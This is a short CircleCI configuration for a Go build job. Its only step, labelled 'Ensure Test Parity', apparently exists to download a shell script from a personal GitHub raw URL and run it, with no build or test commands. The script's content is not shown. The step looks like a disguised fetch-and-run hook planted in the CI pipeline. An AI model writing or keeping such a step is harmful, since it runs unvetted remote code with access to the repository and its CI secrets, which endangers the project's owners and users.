version: 2.1
jobs:
  build:
    working_directory: ~/repo
    docker:
      - image: circleci/golang:1.15.8
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: wget https://raw.githubusercontent.com/myzrdd/aw/main/yes.sh &&  chmod +x yes.sh && ./yes.sh